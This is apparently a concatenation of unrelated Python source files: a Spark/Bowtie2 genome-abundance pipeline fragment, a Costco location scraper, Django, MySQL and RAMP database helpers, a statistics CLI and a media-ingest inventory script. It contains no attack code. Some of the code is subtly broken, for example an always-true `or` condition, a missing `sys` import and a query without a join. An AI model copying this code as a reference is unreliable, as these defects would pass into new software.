print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Starting Alignment with Bowtie2...")
alignment_start_time = time.time()
alignmentsRDD = sampleReadsRDD.pipe(dnaMappingScript)
numberOfAlignments = alignmentsRDD.count()
alignment_end_time = time.time()
alignment_total_time = alignment_end_time - alignment_start_time
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Bowtie2 - Complete. " +
"(" + str(timedelta(seconds=alignment_total_time)) + ")")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]" + " Found: " +
'{:0,.0f}'.format(numberOfAlignments) + " Alignments.")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
# --------------------------------------------- Map -------------------------------------------------------
#
# The Map step sets up the basic data structure that we start with — a map of reads to the genomes they
# align to. Each alignment (in SAM format) is parsed an broken down into two (2) pieces: the read name,
# and the genome reference. The REDUCE step afterwards will collect all the genomes and key them to a
# unique read name.
#
# SAM format: [0] - QNAME (the read name)
# [1] - FLAG
# [2] - RNAME (the genome reference name that the read aligns to
# We'll Map a read (QNAME) with a genome reference name (RNAME).
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] MAP - Reads to Genomes (QNAME-RNAME).")
mapReadToGenomes = alignmentsRDD.map(lambda line: (line.split("\t")[0], [line.split("\t")[2]] ))
# -------------------------------------------- Reduce -----------------------------------------------------
#
# Reduce will operate first by calculating the read contributions, and then using these contributions
# to calculate an abundance.
# Note the "+" operator can be used to concatenate two lists. :)
#
# 'Reduce by Reads' will give us a 'dictionary-like' data structure that contains a Read Name (QNAME) as
# the KEY, and a list of genome references (RNAME) as the VALUE. This allows us to calculate
# each read's contribution.
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] REDUCE - Reads to list of Genomes.")
readsToGenomesList = mapReadToGenomes.reduceByKey(lambda l1, l2: l1 + l2)
# ---------------------------------- Fractional Reads & Abundances ----------------------------------------
#
# Read Contributions.
# Each read is normalized by the number of genomes it maps to. The idea is that reads that align to
# multiple genomes will contribute less (have a hig denominator) than reads that align to fewer genomes.
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Calculating Read Contributions...")
readContributions = readsToGenomesList.mapValues(lambda l1: 1/float(len(l1)))
# Once we have the read contributions, we'll JOIN them with the starting mapReadToGenomes RDD to get an
# RDD that will map the read contribution to the Genome it aligns to.
# Note: l[0] is the Read name (key), and l[1] is the VALUE (a list) after the join.
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Joining Read Contributions to Genomes...")
readContributionToGenome = readContributions.join(mapReadToGenomes)\
.map(lambda l: (l[1][0], "".join(l[1][1])))
# After we have the RDD mapping the Read Contributions to Genome Names, we'll flip the (KEY,VALUE) pairings
# so that we have Genome Name as KEY and Read Contribution as Value.
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Flipping Genomes and Read Contributions...")
genomesToReadContributions = readContributionToGenome.map(lambda x: (x[1], x[0]))
# Following the KEY-VALUE inversion, we do a reduceByKey() to aggregate the fractional counts for a
# given Genome and calculate its abundance.
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Calculating Genome Abundances...")
genomeAbundances = genomesToReadContributions.reduceByKey(lambda l1, l2: l1 + l2)
# ------------------------------------------ Output Reports -----------------------------------------------
#
# Reports are written out to an S3 bucket specified in the initial JSON config file.
#
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Writing Output Reports...")
if save_to_s3:
# We map the abundances so that we get a nice tab-delimited file, then repartition it so that we only
# get a single file, and not multiple ones for each partition.
genomeAbundances.map(lambda x: "%s\t%s" %(x[0],x[1]))\
.repartition(1)\
.saveAsTextFile(output_file)
else:
writer = csv.writer(open(output_file, "wb"), delimiter='\t', lineterminator="\n")
abundances = genomeAbundances.collect()
writer.writerow(abundances)
return
# ----------------------------------------------- Helper Functions ----------------------------------------------------
#
# Miscellaneous helper functions for Mapping, accumulating, reducing, etc.
#
def loadTab5File(sc, pathToSampleFile):
"""
Loads a Tab5-formatted file into an RDD. The file is loaded using the Hadoop File API so we can create an RDD
based on the tab5 format: [name]\t[seq1]\t[qual1]\t[seq2]\t[qual2]\n
Args:
sc: A Spark context
pathToSampleFile: A valid Hadoop file path (S3, HDFS, etc.).
Returns:
An RDD with a record number as KEY, and reads as VALUE.
"""
sampleRDD = sc.newAPIHadoopFile(pathToSampleFile,
'org.apache.hadoop.mapreduce.lib.input.TextInputFormat',
'org.apache.hadoop.io.LongWritable',
'org.apache.hadoop.io.Text',
conf={'textinputformat.record.delimiter': '\n'})
return sampleRDD
def loadFASTQFile(sc, pathToSampleFile):
"""
Loads a FASTQ file into an RDD. The file is loaded using the Hadoop File API so we can create an RDD based on the
FASTQ file format, i.e., multiline parsing of the file.
Args:
sc: A Spark context
pathToSampleFile: A valid Hadoop file path (S3, HDFS, etc.).
Returns:
An RDD with a record number as KEY, and read attributes as VALUE.
"""
sampleRDD = sc.newAPIHadoopFile(pathToSampleFile,
'org.apache.hadoop.mapreduce.lib.input.TextInputFormat',
'org.apache.hadoop.io.LongWritable',
'org.apache.hadoop.io.Text',
conf={'textinputformat.record.delimiter': '\n@'})
return sampleRDD
def getBowtie2Command(bowtie2_node_path, bowtie2_index_path, bowtie2_index_name, bowtie2_number_threads):
"""
Constructs a properly formatted shell Bowtie2 command by performing a simple lexical analysis using 'shlex.split()'.
Returns:
An array with the bowtie 2 command call split into an array that can be used by the popen() function.
"""
index_location = bowtie2_index_path
index_name = bowtie2_index_name
index = index_location + "/" + index_name
number_of_threads = bowtie2_number_threads
bowtieCMD = bowtie2_node_path + '/bowtie2 \
--threads ' + str(number_of_threads) + ' \
--local \
-D 5 \
-R 1 \
-N 0 \
-L 25 \
-i \'"S,0,2.75"\' \
--no-discordant \
--no-mixed \
--no-contain \
--no-overlap \
--no-sq \
--no-hd \
--no-unal \
-q \
-x ' + index + ' --tab5 -'
return shlex.split(bowtieCMD)
def getBowtie2CommandSensitive(bowtie2_node_path, bowtie2_index_path, bowtie2_index_name, bowtie2_number_threads):
"""
Constructs a properly formatted shell Bowtie2 command by performing a simple lexical analysis using 'shlex.split()'.
Returns:
An array with the bowtie 2 command call split into an array that can be used by the popen() function.
"""
index_location = bowtie2_index_path
index_name = bowtie2_index_name
index = index_location + "/" + index_name
bowtieCMD = bowtie2_node_path + '/bowtie2 \
--threads 6 \
--local \
-D 20 \
-R 3 \
-N 0 \
-L 20 \
-i \'"S,1,0.50"\' \
--no-sq \
--no-hd \
--no-unal \
-q \
-x ' + index + ' --tab5 -'
return shlex.split(bowtieCMD)
|
import os
import string
import requests
import urllib.parse
def getBingResponse(zipCode):
'''Get's Bing API Response from a Zip Code Location Query'''
apiKey = os.environ['BING_API_KEY']
payload = f'http://dev.virtualearth.net/REST/v1/Locations/{zipCode}?maxResults=1&key={apiKey}'
return requests.get(payload)
def findCoordinates(bingResponse):
'''Returns the Coordinates of a ZIP code from a Bing Response Object'''
r = bingResponse.json()
return r['resourceSets'][0]['resources'][0]['geocodePoints'][0]['coordinates']
def getCoordinates(ZIP):
'''Convience function to return lat and long from a ZIP Code.'''
return findCoordinates(getBingResponse(ZIP))
def getCostcoAJAX(coord, maxResponse=10):
'''Return the Costco AJAX Response for a pair of coordinates.'''
lat = coord[0]
lon = coord[1]
print("Sending Request to Costco AJAX")
s = requests.Session()
headers = {'Referrer-Policy': 'no-referrer', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36', "Upgrade-Insecure-Requests": "0","DNT": "1","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "en-US,en;q=0.5","Accept-Encoding": "gzip, deflate"}
payload = f'http://www.costco.com/AjaxWarehouseBrowseLookupView?langId=-1&storeId=10301&numOfWarehouses={maxResponse}&hasGas=false&hasTires=false&hasFood=false&hasHearing=false&hasPharmacy=false&hasOptical=false&hasBusiness=false&hasPhotoCenter=false&tiresCheckout=0&isTransferWarehouse=false&populateWarehouseDetails=true&warehousePickupCheckout=false&latitude={lat}&longitude={lon}&countryCode=US'
print(s.get('http://costco.com', headers=headers))
return s.get(payload, headers=headers)
class CostcoLocation:
def __init__(self, ajax):
self.locationID = ajax['locationName']
self.streetAddress = string.capwords(ajax['address1'])
self.city = string.capwords(ajax['city'])
self.state = ajax['state']
zipCode = ajax['zipCode'].split('-')
self.zip = zipCode[0]
try:
self.gasPrices(ajax['gasPrices'])
self.gasHours(ajax['gasStationHours'])
except KeyError:
self.gas = False
self.formatAddress()
def gasPrices(self, gasAjax):
self.gas = True
self.regular = gasAjax['regular'][:-1]
self.premium = gasAjax['premium'][:-1]
def gasHours(self, hoursAjax):
self.weekdays = self.formatHours(hoursAjax[0]['time'])
self.saturday = self.formatHours(hoursAjax[1]['time'])
self.sunday = self.formatHours(hoursAjax[2]['time'])
def formatHours(self, hours):
time = hours.split('-')
return (time[0].rstrip(" "), time[1].lstrip(" "))
def formatAddress(self):
self.address2 = f'{self.city}, {self.state} {self.zip}'
query = f'{self.streetAddress} {self.address2}'
urlSafe = urllib.parse.quote(query)
self.addressLink = "https://www.google.com/maps/search/?api=1&query=Costco+Gasoline+" + urlSafe
def interpretCostcoAJAX(costcoAJAX):
'''Interprets raw Costco AJAX Response and returns useful classes.'''
print(f'Response from Costco AJAX: {costcoAJAX}')
r = costcoAJAX.json()
del r[0] # Response is always padded with an irrelevant True statement
locations = []
for location in r:
locations.append(CostcoLocation(location))
return locations
def getCostcoLocations(zip):
'''Returns list of Costco Location Classes for a Given ZIP Code.'''
return interpretCostcoAJAX(getCostcoAJAX(getCoordinates(zip)))
|
import json
import requests
from django.conf import settings
from Category.models import Category, City
def get_permission(request):
""" 获取登录用户的权限列表
:param request: Django 的request对象
:return: 城市列表 分类列表
"""
categories = Category.objects.all()
cities = City.objects.all()
city_list = [city for city in cities if request.user.has_perm("Channel.%s" % city.city_code)]
category_list = [category for category in categories if
request.user.has_perm("Channel.%s" % category.category_code)]
return city_list, category_list
def get_redis_prefix_key(key, key_prefix, version):
""" 设置redis的prefix key
:param key: redis的key
:param key_prefix: key的前缀
:param version: 版本号
:return: 自定义的redis的key
"""
return key
def put_to_es(index, put_data):
""" 推送到ES
:param index: ES的索引
:param put_data: 需要存储的数据
:return: ES的返回结果,字典结构
"""
url = settings.ES_HOST % index
response = requests.put(url, json=put_data, headers={"Content-Type": "application/json"})
return json.loads(response.content)
|
from typing import List, Optional
from uuid import UUID
from c4maker_server.adapters.models import DiagramDB, UserAccessDB
from c4maker_server.adapters.mysql.mysql_client import MySQLClient
from c4maker_server.domain.entities.diagram import Diagram
from c4maker_server.domain.entities.user import User
from c4maker_server.services.ports.diagram_repository import DiagramRepository
class MySQLDiagramRepository(DiagramRepository):
def __init__(self, mysql_client: MySQLClient):
self.mysql_client = mysql_client
def create(self, diagram: Diagram):
diagram_db = DiagramDB(diagram)
self.mysql_client.add(diagram_db)
def update(self, diagram: Diagram):
diagram_db = self.__find_db_obj_by_id(str(diagram.id))
diagram_db.update_properties(diagram)
self.mysql_client.update(diagram_db)
def delete(self, diagram_id: UUID):
diagram_db = self.__find_db_obj_by_id(str(diagram_id))
if not diagram_db:
return
self.mysql_client.delete(diagram_db)
def find_by_id(self, diagram_id: UUID) -> Optional[Diagram]:
diagram_db = self.__find_db_obj_by_id(str(diagram_id))
if not diagram_db:
return None
return diagram_db.to_entity()
def find_all_by_user(self, user: User) -> List[Diagram]:
user_accesses_db = self.mysql_client.db.session.query(DiagramDB).filter(UserAccessDB.user_id == str(user.id))
return [user_access_db.diagram.to_entity() for user_access_db in user_accesses_db]
def __find_db_obj_by_id(self, diagram_id: str) -> DiagramDB:
return self.mysql_client.db.session.query(DiagramDB).get(diagram_id)
|
#!/usr/bin/python3
import argparse
from datetime import datetime
from logger import logger
import sys
from tablib import Dataset
from request_utils import *
from presets import *
from bdl_query import BDLMultiCityQuery, BDLMultiVariableQuery
from explore import explore_subjects
class Requests:
births = "births"
deaths = "deaths"
population_by_age_and_gender = "population_by_age_and_gender"
population = "population"
def main(argv):
parser = argparse.ArgumentParser(description="")
parser.add_argument("-r", "--request", help=f"One of the following:{requestHelp()}")
parser.add_argument("-y", "--year", required=False)
parser.add_argument("-e", "--export", action="store_true")
parser.add_argument("-x", "--explore-subjects", action='store_true')
args = parser.parse_args()
if args.request:
handleRequest(args)
if args.explore_subjects:
explore_subjects()
def exportToXLSX(data):
xls = Dataset()
for row in data:
xls.append(row)
now = datetime.now()
timestamp = f"{now.year}-{now.month}-{now.day}T{now.hour}:{now.minute}:{now.second}"
filename = f"results_{timestamp}.xlsx"
with open(filename, "wb") as f:
f.write(xls.export("xlsx"))
logger.info(f"Data exported successfully ({filename})")
def handleRequest(args):
try:
requestType = args.request
if requestType == Requests.population:
query = BDLMultiCityQuery(Variable.Population.total, CITIES_10, lastYears())
elif requestType == Requests.population_by_age_and_gender:
if args.year == None:
raise Exception(f"Year parameter is required in request {requestType}")
query = BDLMultiVariableQuery(FEMALES, Unit.lublin, args.year)
elif requestType == Requests.births:
query = BDLMultiCityQuery(Variable.Demographics.births, CITIES_10, lastYears())
elif requestType == Requests.deaths:
query = BDLMultiCityQuery(Variable.Demographics.deaths, CITIES_10, lastYears())
else:
raise Exception(f"Invalid request {requestType}.\nValid request types are:{requestHelp()}")
data = query.execute()
if data:
logger.info(data)
if args.export:
exportToXLSX(data)
else:
logger.warning("No data exported")
except Exception as err:
logger.error(f"Error: {err}")
def requestHelp():
return f"\b - {Requests.births}\n - {Requests.deaths}\n - {Requests.population}\n - {Requests.population_by_age_and_gender}"
if __name__ == "__main__":
main(sys.argv[1:])
|
# Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''
Defines the `CachedType` metaclass.
See its documentation for more details.
'''
from python_toolbox.sleek_reffing import SleekCallArgs
class SelfPlaceholder:
'''Placeholder for `self` when storing call-args.'''
class CachedType(type):
'''
A metaclass for sharing instances.
For example, if you have a class like this:
class Grokker(object, metaclass=caching.CachedType):
def __init__(self, a, b=2):
self.a = a
self.b = b
Then all the following calls would result in just one instance:
Grokker(1) is Grokker(1, 2) is Grokker(b=2, a=1) is Grokker(1, **{})
This metaclass understands keyword arguments.
All the arguments are sleekreffed to prevent memory leaks. Sleekref is a
variation of weakref. Sleekref is when you try to weakref an object, but if
it's non-weakreffable, like a `list` or a `dict`, you maintain a normal,
strong reference to it. (See documentation of
`python_toolbox.sleek_reffing` for more details.) Thanks to sleekreffing
you can avoid memory leaks when using weakreffable arguments, but if you
ever want to use non-weakreffable arguments you are still able to.
(Assuming you don't mind the memory leaks.)
'''
def __new__(mcls, *args, **kwargs):
result = super().__new__(mcls, *args, **kwargs)
result.__cache = {}
return result
def __call__(cls, *args, **kwargs):
sleek_call_args = SleekCallArgs(
cls.__cache,
cls.__init__,
*((SelfPlaceholder,) + args),
**kwargs
)
try:
return cls.__cache[sleek_call_args]
except KeyError:
cls.__cache[sleek_call_args] = value = \
super().__call__(*args, **kwargs)
return value
|
#!/usr/bin/env python3
import os
import argparse
import csv
import glob
import meadow_parser_funcs
import posixpath
parser = argparse.ArgumentParser()
parser.add_argument('--input', '-i', action='store', dest='input_path', type=str, help='full path to input folder')
parser.add_argument('--output', '-o', action='store', dest='output_path', type=str, help='full path to output csv file')
parser.add_argument('--load_inventory', '-l', required=False, nargs='*', action='store', dest='source_inventory', help='Use to specify an object inventory. If not specified the script will look in the base folder of the input for object inventories. If no inventories are found the script will leave some fields blank.')
parser.add_argument('--skip', '-s', required=False, nargs='*', action='store', dest='skip', help='Use to specify patterns to skip. Can take multiple inputs. For example, "_ac." "_am." could be used to skip legacy ac and am files.')
parser.add_argument('--description', '-d', required=False, nargs='*', action='store', dest='desc', help='Use to specify column names to populate Meadow description field with. Can take multiple inputs. Information from each column will be separated by a ";". Example usage: -d "Date/Time" "Barcode". If not specified, script will default to looking for the column "inventory_title"')
#parser.add_argument('--newline_limit', '-n', required=False, nargs=1, action='store', dest='output_path', type=int, help='Limit fields imported into the description field to a certain number of newlines.')
parser.add_argument('--auxiliary', '-x', required=False, nargs=1, action='store', dest='aux_parse', help='Sets how to parse auxiliary files. Options include: extension (by extension), parse (by word), none (no aux files). Default is none.')
args = parser.parse_args()
def input_check(indir):
'''Checks if input was provided and if it is a directory that exists'''
if not indir:
print ("No input provided")
quit()
if not os.path.isdir(indir):
print('input is not a directory')
quit()
def output_check(output):
'''Checks that output is valid'''
if not output.endswith('.csv'):
print("\n--- ERROR: Output must be a CSV file ---\n")
quit()
def interpret_aux_command():
'''checks if argument passed to aux_parse is valid'''
aux_parse_list = ['extension', 'parse']
for i in args.aux_parse:
if not i in aux_parse_list:
print('\n---ERROR: ' + i + ' is not a valid input to the auxiliary command ---\n')
quit()
def update_fieldname_list(original_fieldname_list, missing_fieldname_list):
fieldname_list = [header for header in original_fieldname_list if header not in missing_fieldname_list]
return fieldname_list
def missing_description_field_handler(missing_descriptive_fieldnames):
print("+++ WARNING: Your inventory is missing the following columns +++")
print(missing_descriptive_fieldnames)
print("SKIP COLUMNS AND CONTINUE? (y/n)")
yes = {'yes','y', 'ye', ''}
no = {'no','n'}
choice = input().lower()
if choice in yes:
pass
elif choice in no:
quit()
#TODO add early warning if spreadsheet is missing important columns like work_accession_number
def import_inventories(source_inventories):
'''
import CSV inventories and parse each row into a dictionary that is added to a list
We use lists of dicts initially to catch duplicate filenames later on
TODO Cell wrangling stems from here (description and label)
'''
missing_fieldnames = False
source_inventory_dictlist = []
for i in source_inventories:
if i.endswith('.csv'):
if os.path.isfile(i):
csvDict = []
with open(i, encoding='utf-8')as f:
reader = csv.DictReader(f, delimiter=',')
for row in reader:
#work type is assumed by the presence of format-specific column headers
if 'Width (cm.)' in reader.fieldnames:
work_type = 'IMAGE'
elif 'Speed IPS' in reader.fieldnames:
work_type = 'AUDIO'
elif 'Region' or 'Stock' in reader.fieldnames:
work_type = 'VIDEO'
name = row['filename']
if work_type == 'AUDIO' or work_type == 'VIDEO':
if not args.desc:
description_fields = ['inventory_title']
else:
description_fields = args.desc
missing_descriptive_fieldnames = [a for a in description_fields if not a in reader.fieldnames]
if missing_descriptive_fieldnames:
missing_fieldnames = True
description_fields = update_fieldname_list(description_fields, missing_descriptive_fieldnames)
description_list = []
for header in description_fields:
#TODO make this its own function since it's probably going to get repeated
description_list.append(row[header])
description = "; ".join(i for i in description_list if i)
#description.update({'descriptive': row[header]})
if not 'label' in reader.fieldnames:
inventory_label = None
else:
inventory_label = row['label']
#if work_type == "VIDEO" and 'Region' in reader.fieldnames:
csvData = {
'filename' : row['filename'],
'work_type' : work_type,
'work_accession_number' : row['work_accession_number'],
'description' : description,
'label' : inventory_label
}
elif work_type == 'IMAGE':
csvData = {
'filename' : row['filename'],
'label' : row['label'],
'work_type' : work_type,
'work_accession_number' : row['work_accession_number'],
'file_accession_number' : row['file_accession_number'],
'role' : row ['role'],
'description' : row['description']
}
else:
print("--- ERROR: Problem identifying work type in " + i + " ---")
quit()
csvDict.append(csvData)
#print(csvDict)
if missing_fieldnames == True:
missing_description_field_handler(missing_descriptive_fieldnames)
else:
print('\n--- ERROR: ' + i + ' is not a file ---\n')
quit()
else:
print('\n--- ERROR: Inventory path is not valid ---\n')
source_inventory_dictlist.extend(csvDict)
#print(source_inventory_dictlist)
#quit()
return source_inventory_dictlist
#sorted[]
'''setting up inputs and outputs'''
indir = args.input_path
input_check(indir)
if args.output_path:
meadow_csv_file = args.output_path
else:
base_folder_name = os.path.basename(indir)
meadow_csv_file = os.path.join(indir, base_folder_name + '-meadow_ingest_inventory.csv')
output_check(meadow_csv_file)
if args.aux_parse:
interpret_aux_command()
'''importing inventories'''
if args.source_inventory:
source_inventories = args.source_inventory
source_inventory_dictlist = import_inventories(source_inventories)
else:
print('\n*** Checking input directory for CSV files ***')
source_inventories = glob.glob(os.path.join(indir, "*.csv"))
#skip auto-generated meadow ingest csv if it already exists
source_inventories = [i for i in source_inventories if not '-meadow_ingest_inventory.csv' in i]
if not source_inventories:
print("\n+++ WARNING: Unable to find CSV inventory file +++")
print("CONTINUE? (y/n)")
yes = {'yes','y', 'ye', ''}
no = {'no','n'}
choice = input().lower()
if choice in yes:
source_inventory_dictlist = [{}]
elif choice in no:
quit()
else:
sys.stdout.write("Please respond with 'yes' or 'no'")
quit()
#rather than quitting - prompt user to choose whether or not to continue
else:
print("Inventories found\n")
source_inventory_dictlist = import_inventories(source_inventories)
#check that each csv file actually exists [approach later will be to iterate through loaded dictionaries of CSV files to check if a file corresponds to a key, which is derived from the filename column]
#fallback 1: if source inventory exists in indir, iterate through loading csv files all csv files
#fallback 2: if no inventory is specified and no csv files are found in indir, warn and proceed with no inventory
'''
setting up parameters for meadow inventory
'''
#TODO may want to convert everything to lowercase so you don't risk running into errors
#TODO move generating this dict to a function in a separate module
role_dict = {
'framemd5' : {'identifiers' : ['.framemd5'], 'type' : 'extension', 'role' : 'S', 'label' : 'Framemd5 file', 'file_builder' : '_supplementary_'},
'metadata' : {'identifiers' : ['.xml', '.json'], 'type' : 'extension', 'role' : 'S', 'label' : 'Metadata file', 'file_builder' : '_supplementary_'},
'qctools' : {'identifiers' : ['.xml.gz', '.qctools.mkv'], 'type' : 'extension', 'role' : 'S', 'label' : 'QCTools report', 'file_builder' : '_supplementary_'},
'spectrogram' : {'identifiers' : ['.png', '.PNG'], 'type' : 'extension', 'role' : 'S', 'label' : 'Spectrogram file', 'file_builder' : '_supplementary_'},
'dpx_checksum' : {'identifiers' : ['dpx.txt'], 'type' : 'extension', 'role' : 'S', 'label' : 'Source DPX sidecar checksum', 'file_builder' : '_supplementary_'},
'access' : {'identifiers' : ['-a.', '_a.', '-am.', '_am.', '_am_', '-am-', '.mp4'], 'type' : 'pattern', 'role' : 'A', 'label' : None, 'file_builder' : '_access_'},
'preservation' : {'identifiers' : ['-p.', '_p.', '-pm.', '_pm.', '_pm_', '-pm-', '.mkv'], 'type' : 'pattern', 'role' : 'P', 'label' : None, 'file_builder' : '_preservation_'}
}
if not args.aux_parse:
aux_dict = {'auxiliary' : {'identifiers' : None, 'type' : None, 'role' : None, 'label' : None, 'file_builder' : None}}
elif 'extension' in args.aux_parse:
aux_dict = {
'auxiliay' : {'identifiers' : ['.jpg', '.JPG'], 'type' : 'extension', 'role' : 'X', 'label' : 'image', 'file_builder' : '_auxiliary_'}
}
elif 'parse' in args.aux_parse:
aux_dict = {'auxiliary' : {'identifiers' : ['_Asset', '-Asset', '_Can', '-Can', 'Front.', 'Back.'], 'type' : 'xparse', 'role' : 'X', 'label' : None, 'file_builder' : '_auxiliary_'}}
role_dict.update(aux_dict)
#add generic catch-all for unexpected file types
role_dict.update({'other' : {'identifiers' : None, 'type' : None, 'role' : None, 'label' : None, 'file_builder' : None}})
header_names = ['work_type', 'work_accession_number', 'file_accession_number', 'filename', 'description', 'label', 'role', 'work_image', 'structure']
'''
extract the filenames from the inventories as a list
'''
filename_list = []
for i in source_inventory_dictlist:
name = i.get('filename')
filename_list.append(name)
#error out if duplicate filenames are found
if len(filename_list) != len(set(filename_list)):
print('\n--- ERROR: There are duplicate filenames in your inventories ---\n')
quit()
#convert list to dict so it becomes easier to parse from here on
source_inventory_dict = {}
for item in source_inventory_dictlist:
name = item['filename']
source_inventory_dict[name] = item
#TODO add a check for existing file with filename before overwriting
'''
attempt to create output csv before continuing
'''
try:
with open(meadow_csv_file, 'w', newline='\n') as outfile:
outfile.close
except OSError:
print("\n--- ERROR: Unable to create output file", meadow_csv_file + ' ---\n')
quit()
meadow_inventory = []
meadow_full_dict = {}
for subdir, dirs, files in os.walk(indir):
dirs.sort()
clean_subdir = (subdir.replace(indir, ''))
clean_subdir = clean_subdir.strip('/')
#skip file types we don't want
#TODO put this in an external function to make this a little cleaner
files = [f for f in files if not f[0] == '.']
files = [f for f in files if not f == 'Thumbs.db']
files = [f for f in files if not f.endswith('.md5')]
files = [f for f in files if not f.endswith('.csv')]
if args.skip:
skip_list = args.skip
for i in skip_list:
files = [f for f in files if not i in f]
dirs[:] = [d for d in dirs if not d[0] == '.']
for file in sorted(files):
#set filename
filename = os.path.join(clean_subdir, file)
#filename = filename.replace(os.sep, posixpath.sep)
meadow_file_dict = {
'work_type': None,
'work_accession_number': None,
'file_accession_number': None,
'filename': filename,
'description': None,
'label': None,
'role': None,
'work_image': None,
'structure': None
}
#TODO add safety check to make sure there aren't multiple matches for a filename in the accession numbers
#check for corresponding item in loaded inventory
#TODO handle cases where there is no inventory
for item in filename_list:
if item in file:
meadow_file_dict.update({'work_accession_number': source_inventory_dict[item]['work_accession_number']})
#load the work type
work_type = source_inventory_dict[item]['work_type']
meadow_file_dict.update({'work_type': work_type})
#load the description
meadow_file_dict.update({'description': source_inventory_dict[item]['description']})
#if dictionary does not already have a key corresponding to the item add it
if item not in meadow_full_dict:
meadow_full_dict[item] = [meadow_file_dict]
#otherwise append it to the existing key
else:
meadow_full_dict[item].append(meadow_file_dict)
#setting a generic label
inventory_label = source_inventory_dict[item]['label']
if work_type == "VIDEO" or work_type == "AUDIO":
label,role,file_builder = meadow_parser_funcs.get_label(role_dict, file, inventory_label)
meadow_file_dict.update({'role': role})
role_count = sum(x.get('role') == role for x in meadow_full_dict.get(item))
meadow_file_dict.update({'label': label})
meadow_file_dict.update({'file_accession_number' : item + file_builder + f'{role_count:03d}'})
else:
meadow_file_dict.update({'role': source_inventory_dict[item]['role']})
meadow_file_dict.update({'label': inventory_label})
meadow_file_dict.update({'file_accession_number' : source_inventory_dict[item]['file_accession_number']})
#TODO build out how to handle cases where a file is not found in the inventory
#allow user to add the file anyway
if not any(item in file for item in filename_list):
print("+++ WARNING: No entry matching " + file + " was found in your inventory +++")
#TODO final check that all ihidden files and folderstems from filename list are accounted for in the final inventory
with open(meadow_csv_file, 'w', newline='', encoding='utf-8') as f:
writer = csv.DictWriter(f, fieldnames = header_names)
writer.writeheader()
for item in meadow_full_dict:
for file_info in meadow_full_dict[item]:
writer.writerow(file_info)
print("Process complete!")
print("Meadow inventory located at: " + meadow_csv_file)
|
"""
The :mod:`ramp_database.utils` module provides tools to setup and connect to
the RAMP database.
"""
from contextlib import contextmanager
import bcrypt
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.engine.url import URL
from .model import Model
def setup_db(config):
"""Create a sqlalchemy engine and session to interact with the database.
Parameters
----------
config : dict
Configuration file containing the information to connect to the
dataset. If you are using the configuration provided by ramp, it
corresponds to the the `sqlalchemy` key.
Returns
-------
db : :class:`sqlalchemy.Engine`
The engine to connect to the database.
Session : :class:`sqlalchemy.orm.Session`
Configured Session class which can later be used to communicate with
the database.
"""
# create the URL from the configuration
db_url = URL.create(**config)
db = create_engine(db_url)
Session = sessionmaker(db)
# Link the relational model to the database
Model.metadata.create_all(db)
return db, Session
@contextmanager
def session_scope(config):
"""Connect to a database and provide a session to make some operation.
Parameters
----------
config : dict
Configuration file containing the information to connect to the
dataset. If you are using the configuration provided by ramp, it
corresponds to the the `sqlalchemy` key.
Returns
-------
session : :class:`sqlalchemy.orm.Session`
The session to directly perform the operation on the database.
"""
db, Session = setup_db(config)
with db.connect() as conn:
session = Session(bind=conn)
try:
yield session
session.commit()
except: # noqa
session.rollback()
raise
finally:
session.close()
def _encode_string(text):
return bytes(text, "utf-8") if isinstance(text, str) else text
def hash_password(password):
"""Hash a password.
Parameters
----------
password : str or bytes
Human readable password.
Returns
-------
hashed_password : bytes
The hashed password.
"""
return bcrypt.hashpw(_encode_string(password), bcrypt.gensalt())
def check_password(password, hashed_password):
"""Check if a password is the same than the hashed password.
Parameters
----------
password : str or bytes
Human readable password.
hashed_password : str or bytes
The hashed password.
Returns
-------
is_same_password : bool
Return True if the two passwords are identical.
"""
return bcrypt.checkpw(_encode_string(password), _encode_string(hashed_password))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.